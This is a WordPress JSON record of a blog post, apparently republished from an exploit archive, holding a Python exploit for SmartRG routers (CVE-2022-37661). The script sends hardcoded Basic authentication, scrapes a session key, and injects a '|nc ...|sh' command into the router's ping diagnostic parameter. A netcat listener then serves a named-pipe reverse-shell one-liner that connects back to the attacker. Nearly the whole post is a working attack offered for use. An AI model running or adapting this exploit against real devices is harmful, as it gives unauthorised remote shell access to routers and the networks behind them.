{"id":30505,"date":"2022-09-12T20:20:02","date_gmt":"2022-09-12T16:20:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168336\/smartrg2613-exec.txt"},"modified":"2022-09-13T08:23:47","modified_gmt":"2022-09-13T03:53:47","slug":"smartrg-router-2-6-13-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/smartrg-router-2-6-13-remote-code-execution\/","title":{"rendered":"SmartRG Router 2.6.13 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: SmartRG Router – Remote Code Execution
\n# Date: 13\/06\/2022
\n# Exploit Author: Yerodin Richards
\n# Vendor Homepage: https:\/\/adtran.com
\n# Version: 2.5.15 \/ 2.6.13 (confirmed)
\n# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
\n# CVE : CVE-2022-37661<\/p>\n

import requests
\nfrom subprocess import Popen, PIPE<\/p>\n

router_host = “http:\/\/192.168.1.1”
\nauthorization_header = “YWRtaW46QWRtMW5ATDFtMyM=”<\/p>\n

lhost = “lo”
\nlport = 80<\/p>\n

payload_port = 81<\/p>\n

def main():
\ne_proc = Popen([“echo”, f”rm \/tmp\/s & mknod \/tmp\/s p & \/bin\/sh 0< \/tmp\/s | nc {lhost} {lport} > \/tmp\/s”], stdout=PIPE)
\nPopen([“nc”, “-nlvp”, f”{payload_port}”], stdin=e_proc.stdout)
\nsend_payload(f”|nc {lhost} {payload_port}|sh”)
\nprint(“done.. check shell”)<\/p>\n

def get_session():
\nurl = router_host + “\/admin\/ping.html”
\nheaders = {“Authorization”: “Basic {}”.format(authorization_header)}
\nr = requests.get(url, headers=headers).text
\ni = r.find(“&sessionKey=”) + len(“&sessionKey=”)
\ns = “”
\nwhile r[i] != “‘”:
\ns = s + r[i]\ni = i + 1
\nreturn s<\/p>\n

def send_payload(payload):
\nprint(payload)
\nurl = router_host + “\/admin\/pingHost.cmd”
\nheaders = {“Authorization”: “Basic {}”.format(authorization_header)}
\nparams = {“action”: “add”, “targetHostAddress”: payload, “sessionKey”: get_session()}
\nrequests.get(url, headers=headers, params=params).text<\/p>\n

main()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: SmartRG Router – Remote Code Execution # Date: 13\/06\/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https:\/\/adtran.com # Version: 2.5.15 \/ 2.6.13 (confirmed) # Tested on: SR506n (2.5.15) & SR510n (2.6.13) # CVE : CVE-2022-37661 import requests from subprocess import Popen, PIPE router_host = “http:\/\/192.168.1.1” authorization_header = “YWRtaW46QWRtMW5ATDFtMyM=” lhost = “lo” …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-30505","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30505","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=30505"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30505\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=30505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=30505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=30505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}